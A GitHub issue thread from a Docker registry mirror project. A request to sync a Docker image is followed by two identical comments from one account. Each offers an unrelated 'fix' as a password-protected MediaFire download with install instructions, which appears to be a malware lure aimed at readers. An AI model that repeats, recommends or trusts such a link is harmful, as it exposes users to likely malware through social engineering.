### ISSUE TITLE
registry.hub.docker.com/r/charlocharlie/epicgames-freegames:latest

### ISSUE THREAD

**Issue by lyc6858** [kubesre/docker-registry-mirrors#2028]
IMAGE SYNC

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
